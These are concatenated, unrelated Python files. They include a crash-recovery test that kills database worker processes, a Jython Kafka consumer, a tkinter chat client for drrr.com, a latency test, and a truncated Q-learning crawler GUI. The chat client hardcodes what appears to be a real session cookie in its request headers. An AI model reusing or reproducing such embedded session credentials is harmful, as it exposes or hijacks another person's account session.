RenderProcess.join()
print('RenderProcess.is_alive()', RenderProcess.is_alive())
if uploadprocess.is_alive() :
uploadprocess.terminate()
uploadprocess.join()
print('uploadprocess.is_alive()', uploadprocess.is_alive())
print('All Process Done')
#f.close()
#CurrentDronedata.updateReceiveCommand(False)
#for thread in enumerate(threads):
# thread.join()
##############################################################################
##############################################################################
|
test_crash_recovery.py
|
from base import pipeline, clean_db
import os
import random
import signal
from subprocess import check_output, CalledProcessError
import threading
import time
def _get_pids(grep_str):
try:
out = check_output('ps aux | grep "postgres" | grep "%s"' % grep_str,
shell=True).split('\n')
except CalledProcessError:
return []
out = filter(lambda s: len(s), out)
if not out:
return []
pids = []
for line in out:
line = line.split()
pid = int(line[1].strip())
pids.append(pid)
return pids
def _get_pid(grep_str):
pids = _get_pids(grep_str)
if not pids:
return -1
return random.choice(pids)
def _kill(pid):
if pid <= 0:
return False
os.kill(pid, signal.SIGTERM)
return True
def get_worker_pids():
return _get_pids('worker[0-9] \[postgres\]')
def get_combiner_pids():
return _get_pids('combiner[0-9] \[postgres\]')
def kill_worker():
return _kill(_get_pid('worker[0-9] \[postgres\]'))
def kill_combiner():
return _kill(_get_pid('combiner[0-9] \[postgres\]'))
def test_simple_crash(pipeline, clean_db):
"""
Test simple worker and combiner crashes.
"""
pipeline.create_stream('stream0', x='int')
q = 'SELECT COUNT(*) FROM stream0'
pipeline.create_cv('test_simple_crash', q)
pipeline.insert('stream0', ['x'], [(1,), (1,)])
result = pipeline.execute('SELECT * FROM test_simple_crash')[0]
assert result['count'] == 2
# This batch can potentially get lost.
pipeline.insert('stream0', ['x'], [(1,), (1,)])
assert kill_worker()
pipeline.insert('stream0', ['x'], [(1,), (1,)])
result = pipeline.execute('SELECT * FROM test_simple_crash')[0]
assert result['count'] in [4, 6]
# This batch can potentially get lost.
pipeline.insert('stream0', ['x'], [(1,), (1,)])
assert kill_combiner()
pipeline.insert('stream0', ['x'], [(1,), (1,)])
result = pipeline.execute('SELECT * FROM test_simple_crash')[0]
assert result['count'] in [6, 8, 10]
# To ensure that all remaining events in ZMQ queues have been consumed
time.sleep(2)
def test_concurrent_crash(pipeline, clean_db):
"""
Test simple worker and combiner crashes.
"""
pipeline.create_stream('stream0', x='int')
q = 'SELECT COUNT(*) FROM stream0'
pipeline.create_cv('test_concurrent_crash', q)
batch_size = 25000
desc = [0, 0, False]
vals = [(1,)] * batch_size
def insert():
while True:
pipeline.insert('stream0', ['x'], vals)
desc[1] += batch_size
if desc[2]:
break
def kill():
for _ in xrange(30):
r = random.random()
if r > 0.85:
desc[0] += kill_combiner()
if r < 0.15:
desc[0] += kill_worker()
time.sleep(0.1)
desc[2] = True
threads = [threading.Thread(target=insert),
threading.Thread(target=kill)]
map(lambda t: t.start(), threads)
map(lambda t: t.join(), threads)
num_killed = desc[0]
num_inserted = desc[1]
result = pipeline.execute('SELECT count FROM test_concurrent_crash')[0]
assert num_killed > 0
assert result['count'] <= num_inserted
assert result['count'] >= num_inserted - (num_killed * batch_size)
# To ensure that all remaining events in ZMQ queues have been consumed
time.sleep(2)
def test_restart_recovery(pipeline, clean_db):
pipeline.create_stream('stream0', x='int')
q = 'SELECT COUNT(*) FROM stream0'
pipeline.create_cv('test_restart_recovery', q)
pipeline.insert('stream0', ['x'], [(1,), (1,)])
result = pipeline.execute('SELECT * FROM test_restart_recovery')[0]
assert result['count'] == 2
# Need to sleep here, otherwise on restart the materialization table is
# empty. Not sure why.
time.sleep(0.1)
# Restart.
pipeline.stop()
pipeline.run()
result = pipeline.execute('SELECT * FROM test_restart_recovery')[0]
assert result['count'] == 2
pipeline.insert('stream0', ['x'], [(1,), (1,)])
result = pipeline.execute('SELECT * FROM test_restart_recovery')[0]
assert result['count'] == 4
def test_postmaster_worker_recovery(pipeline, clean_db):
"""
Verify that the postmaster only restarts crashed worker processes, and does not
attempt to start them when the continuous query scheduler should.
"""
expected_workers = len(get_worker_pids())
assert expected_workers > 0
expected_combiners = len(get_combiner_pids())
assert expected_combiners > 0
def backend():
try:
# Just keep a long-running backend connection open
client = pipeline.engine.connect()
client.execute('SELECT pg_sleep(10000)')
except:
pass
t = threading.Thread(target=backend)
t.start()
attempts = 0
result = None
backend_pid = 0
while not result and attempts < 10:
result = pipeline.execute("""SELECT pid, query FROM pg_stat_activity WHERE lower(query) LIKE '%%pg_sleep%%'""")[0]
time.sleep(1)
attempts += 1
assert result
backend_pid = result['pid']
os.kill(backend_pid, signal.SIGKILL)
attempts = 0
pipeline.conn = None
while attempts < 20:
try:
pipeline.execute('SELECT 1')
break
except:
time.sleep(1)
pass
attempts += 1
assert pipeline.conn
# Now verify that we have the correct number of CQ worker procs
assert expected_workers == len(get_worker_pids())
assert expected_combiners == len(get_combiner_pids())
|
main.py
|
import datetime
import json
import os
import sys
import time
import traceback
from consumer import KafkaConsumer
from processor import BagheeraMessageProcessor
import Queue
import threading
import config
import codecs
sys.path.extend(['log4j.properties'])
sys.stdout = codecs.getwriter('utf-8')(sys.stdout)
from java.lang import System
from java.util.zip import GZIPOutputStream
from java.io import FileOutputStream
from java.io import PrintWriter
import com.alibaba.fastjson.JSON as JSON
from reportfilter import Filter
def runner(offsets):
fltr = Filter()
queues = {}
bmp_map = {}
offset_update_freq = config.offset_update_freq
for host in config.bagheera_nodes:
for topic in config.topics:
for partition in config.partitions:
queue = Queue.Queue(256)
queues[(host, topic, partition)] = queue
bmp = BagheeraMessageProcessor(queue)
bmp_map[id(bmp)] = (host, topic, partition)
offset = offsets[(host, topic, partition)]
kc = KafkaConsumer(host, {}, topic, partition, bmp.processor, offset, offset_update_freq)
t = threading.Thread(target = kc.process_messages_forever)
t.start()
strtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
fos = FileOutputStream("redacted/redacted_%s.gz"%(strtime))
gos = GZIPOutputStream(fos)
writer = PrintWriter(gos)
uf_fos = FileOutputStream("raw/unfiltered_%s.gz"%(strtime))
uf_gos = GZIPOutputStream(uf_fos)
uf_writer = PrintWriter(uf_gos)
err_fos = FileOutputStream("errors/errors_%s.gz"%(strtime))
err_gos = GZIPOutputStream(err_fos)
err_writer = PrintWriter(err_gos)
count = 0
while True:
for htp, q in queues.iteritems():
try:
v = q.get(False)
except Queue.Empty:
continue
if v[1] == 'PUT':
count = count + 1
pid, op, ts, ipaddr, doc_id, payload = v
json_payload = JSON.toJSONString(payload)
uf_writer.println(json_payload)
#TODO: figure out less braindead way of working with
# java.util.HashMaps in jython
try:
filtered = json.loads(json_payload)
# System.out.println('%s %s %d %s %s %s' % (htp[1], op, ts, ipaddr, doc_id, json_payload))
fltr.filter_document(filtered)
filtered['doc_id'] = doc_id
writer.println(json.dumps(filtered))
#print doc_id
except:
err_writer.println(doc_id+" "+json_payload);
if count % 10000 == 0:
print ts
def parse_offsets(filex):
offsets = {}
# lines in this "file" contain one serialized (json) entry per line with following fields
# time_millis hostname topic partition offset
#
for i in open(filex, "r"):
try:
dictx = json.loads(i)
host = dictx['hostname']
topic = dictx['topic']
partition = dictx['partition']
offset = dictx['offset']
offsets[(host, topic, partition)] = offset
except:
pass
if (not offsets) or (len(offsets) != (len(config.topics) * len(config.partitions) * len(config.bagheera_nodes))):
System.err.println("ERROR: could not find valid initial offsets for given configuration")
sys.exit(1)
return offsets
if __name__ == '__main__':
if len(sys.argv) != 2:
System.err.println("Needs file containing offsets as first argument")
sys.exit(1)
try:
runner(parse_offsets(sys.argv[1]))
except:
System.err.println("ERROR: " + traceback.format_exc())
finally:
System.exit(1)
|
LoginPage.py
|
# -- coding: utf-8 --
import tkinter as tk
import tkinter.ttk as ttk
import tkinter.messagebox
import requests, json, re
import threading
import queue
import time
import main_part
class LoginPage(object):
def __init__(self, root):
self.root = root
self.root.geometry("255x255+561+268")
self.LoginPage()
self.queue = queue.Queue()
# self.names_list = []
def LoginPage(self):
font = "-family {Microsoft YaHei UI Light} -size 11 -weight " \
"bold -slant roman -underline 0 -overstrike 0"
self.loginPage = tk.Frame(master=self.root, height=261, width=255, bg='black')
self.loginPage.pack()
username = tk.StringVar()
self.userNameEntry = ttk.Combobox(self.loginPage, textvariable=username)
self.userNameEntry.place(relx=0.23, rely=0.23, height=25, relwidth=0.59)
self.userNameEntry.configure(background="white",
font=font,
foreground="#000000",
width=154,)
self.get_users_thread()
room = tk.StringVar()
self.roomChooseEntry = ttk.Combobox(self.loginPage, textvariable=room)
self.roomChooseEntry.place(relx=0.23, rely=0.58, height=25, relwidth=0.59)
self.roomChooseEntry.configure(font=font,
background="white",
foreground="#000000",)
self.roomChooseEntry.bind('<Return>', self.login)
self.get_rooms_thread()
self.LoginButton = tk.Button(self.loginPage, command=self.login)
self.LoginButton.place(relx=0.402, rely=0.8, height=28, width=45)
self.LoginButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
text='''登陆''',
width=45,)
self.UserLabel = tk.Label(self.loginPage)
self.UserLabel.place(relx=0.038, rely=0.23, height=23, width=42)
self.UserLabel.configure(activebackground="#000000",
activeforeground="white",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''用户名''',)
self.RoomLabel = tk.Label(self.loginPage)
self.RoomLabel.place(relx=0.038, rely=0.59, height=23, width=42)
self.RoomLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''房间名''',)
self.appLabel = tk.Label(self.loginPage)
self.appLabel.place(relx=0.307, rely=0.044, height=33, width=97)
self.appLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''DOLLARS''',
font=font,
width=97,)
def login(self, event=None):
self.userName = self.userNameEntry.get()
self.roomName = self.roomChooseEntry.get()
if self.userName == '' or self.roomName == '':
tkinter.messagebox.showerror("错误", "用户名/房间名 信息不完整")
else:
self.roomName, self.roomId, self.session= main_part.login(self.userName, self.roomName, self.roomInfos)
if self.roomName and self.roomId:
self.loginPage.destroy()
self.show_room(self.roomName)
def show_room(self, roomName):
threading.Thread(target=self.save_users).start()
self.root.geometry('528x452+526+169')
chatRoom = tk.Frame(master=self.root, height=453, width=528, bg='black')
chatRoom.place(relx=0.0, rely=0.0, relheight=1.007, relwidth=1.013)
chatRoom.pack()
self.root.title(roomName)
entry = tk.StringVar()
self.Entry = tk.Entry(chatRoom, textvariable=entry)
self.Entry.place(relx=0.019, rely=0.911, height=27, relwidth=0.568)
self.Entry.configure(background="black",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
insertbackground="white",
selectbackground="#c4c4c4",
selectforeground="black")
self.Entry.bind('<Return>', self.button)
self.postButton = tk.Button(chatRoom, command=self.button)
self.postButton.place(relx=0.019, rely=0.824, height=28, width=299)
self.postButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#ffffff",
disabledforeground="#a3a3a3",
foreground="#000000",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
text='''发送''',)
self.getMessageText = tk.Text(chatRoom)
self.getMessageText.configure(background='#000000')
self.getMessageText.place(relx=0.019, rely=0.022, relheight=0.777, relwidth=0.568)
self.roomListLabel = tk.Label(chatRoom)
self.roomListLabel.place(relx=0.606, rely=0.022, height=25, width=194)
self.roomListLabel.configure(activebackground="#f9f9f9",
activeforeground="black",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
relief='groove',
text='''房间列表''',)
self.roomListLabel.bind('<Button-1>', self.create_room_thread)
self.roomListbox = tk.Listbox(chatRoom)
self.roomListbox.place(relx=0.606, rely=0.088, relheight=0.5, relwidth=0.367)
self.roomListbox.configure(background="#000000",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
relief='groove',
selectbackground="#c4c4c4",
selectforeground="black",
width=194,)
self.roomListbox.bind('<Double-Button-1>', self.join_new_room)
self.memberLabel = tk.Label(chatRoom)
self.memberLabel.place(relx=0.606, rely=0.597, height=25, width=194)
self.memberLabel.configure(activebackground="#f9f9f9",
activeforeground="black",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
relief='groove',
text='''成员列表''',)
self.memberListbox = tk.Listbox(chatRoom)
self.memberListbox.place(relx=0.606, rely=0.664, relheight=0.31, relwidth=0.367)
self.memberListbox.configure(background="#000000",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
selectbackground="#c4c4c4",
selectforeground="black",
width=194,)
main_part.get_message_thread(self.userName, self.getMessageText, self.roomId, self.memberListbox, self.queue)
main_part.get_room_thread(self.roomListbox)
def button(self, event=None):
message = self.Entry.get()
main_part.post_message(self.roomId, message, self.Entry, self.root)
def get_rooms_thread(self):
room_thread = threading.Thread(target=self.get_rooms)
room_thread.setDaemon(True)
room_thread.start()
def get_rooms(self):
headers = {
'accept': 'application/json, text/javascript, */*; q=0.01',
'accept-language': 'zh-CN,zh;q=0.9',
'referer': 'https://drrr.com/lounge',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'x-requested-with': 'XMLHttpRequest',
'cookie': '__cfduid=d0f2d37f03823a2fce2f58a60c43218c61547450103;drrr-session-1=q57dhbunjsjq5a0st60ulvmf17'
}
roomUrl = 'https://drrr.com/lounge?api=json'
response = requests.get(url=roomUrl, headers=headers).text
self.roomInfos = json.loads(response)['rooms']
roomNames = [roomInfo['name'] for roomInfo in self.roomInfos
if roomInfo['language'] == 'zh-CN' and roomInfo['limit'] != roomInfo['total']]
try:
self.roomChooseEntry['values'] = roomNames
except:
pass
def get_users_thread(self):
user_thread = threading.Thread(target=self.get_users)
user_thread.setDaemon(True)
user_thread.start()
def get_users(self):
with open('./users.txt', 'a+') as f:
f.seek(0)
content = f.read()
if content != '':
self.names_list = json.loads(content)
self.userNameEntry['values'] = self.names_list
def save_users(self):
if self.userName not in self.names_list:
self.names_list.append(self.userName)
with open('./users.txt', 'w+') as f:
f.write(json.dumps(self.names_list))
def join_new_room(self, event=None):
value = self.roomListbox.get(self.roomListbox.curselection()[0])
roomName = re.search('<(.*?) (\d/\d)>', value).group(1)
join_header = {
'Host': 'drrr.com',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Referer': 'https://drrr.com/lounge/',
}
room = self.session.get('https://drrr.com/lounge?api=json', headers=join_header)
room_id = None
rooms = json.loads(room.text)['rooms']
for room in rooms:
if room['name'] == roomName:
room_id = room['roomId']
if room_id:
data = {
'message': '/leave',
'url': '',
'to': '',
}
session_headers = {
'authority': 'drrr.com',
'method': 'POST',
'path': '/room/?ajax=1',
'scheme': 'https',
'accept': '*/*',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://drrr.com',
'referer': None,
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'x-requested-with': 'XMLHttpRequest',
}
post_message_url = 'https://drrr.com/room/?ajax=1'
while True:
response = self.session.post(url=post_message_url, headers=session_headers, data=data)
if response.status_code == 200:
break
time.sleep(2)
main_part.join(room_id)
self.queue.put_nowait('stop')
self.root.title(roomName)
main_part.get_message_thread(self.userName, self.getMessageText, room_id, self.memberListbox, self.queue)
else:
tkinter.messagebox.showerror('错误', '房间名不存在')
def create_room_thread(self, event=None):
threading.Thread(target=self.create_room).start()
def create_room(self):
create_root = tk.Tk()
create_root.geometry("330x216+525+285")
create_root.title("创建房间")
create_root.iconbitmap('./drrr.ico')
create_root.configure(background="#000000")
roomName = tk.StringVar()
roomNameEntry = tk.Entry(create_root, textvariable=roomName)
roomNameEntry.place(relx=0.258, rely=0.278, height=23, relwidth=0.467)
roomNameEntry.configure(background="white",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#000000",
insertbackground="black",
width=154,)
count = tk.StringVar()
countCombobox = ttk.Combobox(create_root, textvariable=count)
countCombobox.place(relx=0.258, rely=0.648, relheight=0.106, relwidth=0.467)
countCombobox['values'] = [i for i in range(2,21)]
music = tk.IntVar()
musicCheckbutton = tk.Checkbutton(create_root, variable=music,)
musicCheckbutton.place(relx=0.773, rely=0.255, relheight=0.125, relwidth=0.194)
musicCheckbutton.configure(activebackground="#000000",
activeforeground="#ffffff",
background="#000000",
disabledforeground="#000000",
foreground="#ffffff",
highlightbackground="#000000",
highlightcolor="black",
selectcolor='black',
justify='left',
text='''音乐房''', )
adult = tk.IntVar()
adultCheckbutton = tk.Checkbutton(create_root, variable=adult,)
adultCheckbutton.place(relx=0.773, rely=0.463, relheight=0.125, relwidth=0.194)
adultCheckbutton.configure(activebackground="#000000",
activeforeground="#ffffff",
background="#000000",
disabledforeground="#000000",
foreground="#ffffff",
highlightbackground="#000000",
highlightcolor="black",
selectcolor='black',
justify='left',
text='''成人室''', )
hidden = tk.IntVar()
hiddenCheckbutton = tk.Checkbutton(create_root, variable=hidden)
hiddenCheckbutton.place(relx=0.773, rely=0.648, relheight=0.125, relwidth=0.23)
hiddenCheckbutton.configure(activebackground="#000000",
activeforeground="#ffffff",
background="#000000",
disabledforeground="#000000",
foreground="#ffffff",
highlightbackground="#000000",
highlightcolor="black",
selectcolor='black',
justify='left',
text='''隐藏房间''', )
roomNameLabel = tk.Label(create_root)
roomNameLabel.place(relx=0.061, rely=0.255, height=23, width=54)
roomNameLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''房间名称''')
descriptionLabel = tk.Label(create_root)
descriptionLabel.place(relx=0.061, rely=0.486, height=23, width=54)
descriptionLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''房间描述''',)
countLabel = tk.Label(create_root)
countLabel.place(relx=0.061, rely=0.648, height=23, width=54)
countLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''成员人数''',)
createButton = tk.Button(create_root, command=lambda: self.create_room_(roomName=roomNameEntry.get(),
description=descriptionEntry.get(),
limit=countCombobox.get(),
language='zh-CN',
music=music.get(),
root=create_root))
createButton.place(relx=0.409, rely=0.833, height=28, width=49)
createButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
text='''创建''',)
descriptionEntry = tk.Entry(create_root)
descriptionEntry.place(relx=0.258, rely=0.463, height=23, relwidth=0.467)
descriptionEntry.configure(background="white",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#000000",
highlightbackground="#d9d9d9",
highlightcolor="black",
insertbackground="black",
selectbackground="#c4c4c4",
selectforeground="black",)
font9 = "-family {Microsoft YaHei UI} -size 11 -weight bold " \
"-slant roman -underline 0 -overstrike 0"
createLabel = tk.Label(create_root)
createLabel.place(relx=0.379, rely=0.069, height=25, width=76)
createLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
font=font9,
foreground="#ffffff",
text='''DOLLARS''', )
create_root.mainloop()
def create_room_(self, roomName, description, limit, language, music, root):
data = {
'message': '/leave',
'url': '',
'to': '',
}
session_headers = {
'authority': 'drrr.com',
'method': 'POST',
'path': '/room/?ajax=1',
'scheme': 'https',
'accept': '*/*',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://drrr.com',
'referer': None,
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'x-requested-with': 'XMLHttpRequest',
}
post_message_url = 'https://drrr.com/room/?ajax=1'
while True:
response = self.session.post(url=post_message_url, headers=session_headers, data=data)
if response.status_code == 200:
break
time.sleep(2)
main_part.create_room(name=roomName,
description=description,
limit=limit,
language=language,
music=music)
data = {
'name': roomName,
'description': description,
'limit': limit,
'language': language,
'submit': '创建房间'
}
if music == 1 :
music = 'true'
data.update({'music': music})
create_headers = {
'authority': 'drrr.com',
'method': 'POST',
'path': '/create_room/?',
'scheme': 'https',
'cache - control': 'max - age = 0',
'accept': '*/*',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://drrr.com',
'referer': 'https://drrr.com/create_room/?',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'x-requested-with': 'XMLHttpRequest',
}
create_url = 'https://drrr.com/create_room/?'
response = self.session.post(url=create_url, data=data, headers=create_headers, allow_redirects=False)
if response.status_code == 302:
url = 'https://drrr.com/room/'
join_headers = {
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Referer': 'https://drrr.com/lounge',
'Accept-Language': 'zh-CN,zh;q=0.9',
}
response = self.session.get(url, headers=join_headers).text
room_id = re.search('data-url=".*id=(.*?)"', response).group(1)
self.queue.put_nowait('stop')
self.root.title(roomName)
root.destroy()
main_part.get_message_thread(self.userName, self.getMessageText, room_id, self.memberListbox, self.queue)
else:
tk.messagebox.showerror('错误', '房间名已存在')
|
server_latency_test.py
|
import threading
from time import time
from network import receive, send
class ServerLatencyTest:
def __init__(self, to_client_connections: dict, from_client_connections: dict) -> None:
self._to_client_connections = to_client_connections
self._from_client_connections = from_client_connections
self._latencies = {}
def run(self):
data = {
"type": "request",
"request": "timestamp"
}
threads = []
for from_client_connection, client_name in self._from_client_connections.items():
to_client_connection = self._to_client_connections[client_name]
latency_thread = threading.Thread(target=self._get_timestamp_difference, args=(data, client_name, to_client_connection, from_client_connection))
threads.append(latency_thread)
for latency_thread in threads:
latency_thread.start()
for latency_thread in threads:
latency_thread.join()
for client_name, time_difference in self._latencies.items():
print(f"{client_name}: {time_difference}")
def _get_timestamp_difference(self, data, client_name, to_client_connection, from_client_connection):
send([to_client_connection], data)
[data] = receive([from_client_connection])
if data["type"] == "state":
self._latencies[client_name] = time() - data["state"]
else:
raise RuntimeError("Cannot handle data of type: " + data["type"])
|
graphicsCrawlerDisplay.py
|
# graphicsCrawlerDisplay.py
# -------------------------
import Tkinter
import pendulum as pendulum
import qlearningAgents
import time
import threading
import sys
import crawler
# import pendulum
import math
from math import pi as PI
robotType = 'crawler'
class Application:
def sigmoid(self, x):
return 1.0 / (1.0 + 2.0 ** (-x))
def incrementSpeed(self, inc):
self.tickTime *= inc
# self.epsilon = min(1.0, self.epsilon)
# self.epsilon = max(0.0,self.epsilon)
# self.learner.setSpeed(self.epsilon)
self.speed_label['text'] = 'Step Delay: %.5f' % (self.tickTime)
def incrementEpsilon(self, inc):
self.ep += inc
self.epsilon = self.sigmoid(self.ep)
self.learner.setEpsilon(self.epsilon)
self.epsilon_label['text'] = 'Epsilon: %.3f' % (self.epsilon)
def incrementGamma(self, inc):
self.ga += inc
self.gamma = self.sigmoid(self.ga)
self.learner.setDiscount(self.gamma)
self.gamma_label['text'] = 'Discount: %.3f' % (self.gamma)
def incrementAlpha(self, inc):
self.al += inc
self.alpha = self.sigmoid(self.al)
self.learner.setLearningRate(self.alpha)
self.alpha_label['text'] = 'Learning Rate: %.3f' % (self.alpha)
def __initGUI(self, win):
## Window ##
self.win = win
## Initialize Frame ##
win.grid()
self.dec = -.5
self.inc = .5
self.tickTime = 0.1
## Epsilon Button + Label ##
self.setupSpeedButtonAndLabel(win)
self.setupEpsilonButtonAndLabel(win)
## Gamma Button + Label ##
self.setUpGammaButtonAndLabel(win)
## Alpha Button + Label ##
self.setupAlphaButtonAndLabel(win)
## Exit Button ##
# self.exit_button = Tkinter.Button(win,text='Quit', command=self.exit)
# self.exit_button.grid(row=0, column=9)
## Simulation Buttons ##
# self.setupSimulationButtons(win)
## Canvas ##
self.canvas = Tkinter.Canvas(root, height=200, width=1000)
self.canvas.grid(row=2, columnspan=10)
def setupAlphaButtonAndLabel(self, win):
self.alpha_minus = Tkinter.Button(win,
text="-", command=(lambda: self.incrementAlpha(self.dec)))
self.alpha_minus.grid(row=1, column=3, padx=10)
self.alpha = self.sigmoid(self.al)
self.alpha_label = Tkinter.Label(win, text='Learning Rate: %.3f' % (self.alpha))
self.alpha_label.grid(row=1, column=4)
self.alpha_plus = Tkinter.Button(win,
text="+", command=(lambda: self.incrementAlpha(self.inc)))
self.alpha_plus.grid(row=1, column=5, padx=10)
def setUpGammaButtonAndLabel(self, win):
self.gamma_minus = Tkinter.Button(win,
text="-", command=(lambda: self.incrementGamma(self.dec)))
self.gamma_minus.grid(row=1, column=0, padx=10)
self.gamma = self.sigmoid(self.ga)
self.gamma_label = Tkinter.Label(win, text='Discount: %.3f' % (self.gamma))
self.gamma_label.grid(row=1, column=1)
self.gamma_plus = Tkinter.Button(win,
text="+", command=(lambda: self.incrementGamma(self.inc)))
self.gamma_plus.grid(row=1, column=2, padx=10)
def setupEpsilonButtonAndLabel(self, win):
self.epsilon_minus = Tkinter.Button(win,
text="-", command=(lambda: self.incrementEpsilon(self.dec)))
self.epsilon_minus.grid(row=0, column=3)
self.epsilon = self.sigmoid(self.ep)
self.epsilon_label = Tkinter.Label(win, text='Epsilon: %.3f' % (self.epsilon))
self.epsilon_label.grid(row=0, column=4)
self.epsilon_plus = Tkinter.Button(win,
text="+", command=(lambda: self.incrementEpsilon(self.inc)))
self.epsilon_plus.grid(row=0, column=5)
def setupSpeedButtonAndLabel(self, win):
self.speed_minus = Tkinter.Button(win,
text="-", command=(lambda: self.incrementSpeed(.5)))
self.speed_minus.grid(row=0, column=0)
self.speed_label = Tkinter.Label(win, text='Step Delay: %.5f' % (self.tickTime))
self.speed_label.grid(row=0, column=1)
self.speed_plus = Tkinter.Button(win,
text="+", command=(lambda: self.incrementSpeed(2)))
self.speed_plus.grid(row=0, column=2)
def skip5kSteps(self):
self.stepsToSkip = 5000
def __init__(self, win):
self.ep = 0
self.ga = 2
self.al = 2
self.stepCount = 0
## Init Gui
self.__initGUI(win)
# Init environment
if robotType == 'crawler':
self.robot = crawler.CrawlingRobot(self.canvas)
self.robotEnvironment = crawler.CrawlingRobotEnvironment(self.robot)
elif robotType == 'pendulum':
self.robot = pendulum.PendulumRobot(self.canvas)
self.robotEnvironment = \
pendulum.PendulumRobotEnvironment(self.robot)
else:
raise Exception("Unknown RobotType")
# Init Agent
simulationFn = lambda agent: \
simulation.SimulationEnvironment(self.robotEnvironment, agent)
actionFn = lambda state: \
self.robotEnvironment.getPossibleActions(state)
self.learner = qlearningAgents.QLearningAgent(actionFn=actionFn)
self.learner.setEpsilon(self.epsilon)
self.learner.setLearningRate(self.alpha)
self.learner.setDiscount(self.gamma)
# Start GUI
self.running = True
self.stopped = False
self.stepsToSkip = 0
self.thread = threading.Thread(target=self.run)
self.thread.start()
def exit(self):
self.running = False
for i in range(5):
if not self.stopped:
time.sleep(0.1)
try:
self.win.destroy()
except:
pass
sys.exit(0)
def step(self):
self.stepCount += 1
state = self.robotEnvironment.getCurrentState()
actions = self.robotEnvironment.getPossibleActions(state)
if len(actions) == 0.0:
self.robotEnvironment.reset()
state = self.robotEnvironment.getCurrentState()
actions = self.robotEnvironment.getPossibleActions(state)
print 'Reset!'
action = self.learner.getAction(state)
if action == None:
raise Exception('None action returned: Code Not Complete')
nextState, reward = self.robotEnvironment.doAction(action)
self.learner.observeTransition(state, action, nextState, reward)
def animatePolicy(self):
if robotType != 'pendulum':
raise Exception('Only pendulum can animatePolicy')
totWidth = self.canvas.winfo_reqwidth()
totHeight = self.canvas.winfo_reqheight()
length = 0.48 * min(totWidth, totHeight)
x, y = totWidth - length - 30, length + 10
angleMin, angleMax = self.robot.getMinAndMaxAngle()
velMin, velMax = self.robot.getMinAndMaxAngleVelocity()
if not 'animatePolicyBox' in dir(self):
self.canvas.create_line(x, y, x + length, y)
self.canvas.create_line(x + length, y, x + length, y - length)
self.canvas.create_line(x + length, y - length, x, y - length)
self.canvas.create_line(x, y - length, x, y)
self.animatePolicyBox = 1
self.canvas.create_text(x + length / 2, y + 10, text='angle')
self.canvas.create_text(x - 30, y - length / 2, text='velocity')
self.canvas.create_text(x - 60, y - length / 4, text='Blue = kickLeft')
self.canvas.create_text(x - 60, y - length / 4 + 20, text='Red = kickRight')
self.canvas.create_text(x - 60, y - length / 4 + 40, text='White = doNothing')
angleDelta = (angleMax - angleMin) / 100
velDelta = (velMax - velMin) / 100
for i in range(100):
angle = angleMin + i * angleDelta
for j in range(100):
vel = velMin + j * velDelta
state = self.robotEnvironment.getState(angle, vel)
max, argMax = None, None
if not self.learner.seenState(state):
argMax = 'unseen'
else:
for action in ('kickLeft', 'kickRight', 'doNothing'):
qVal = self.learner.getQValue(state, action)
if max == None or qVal > max:
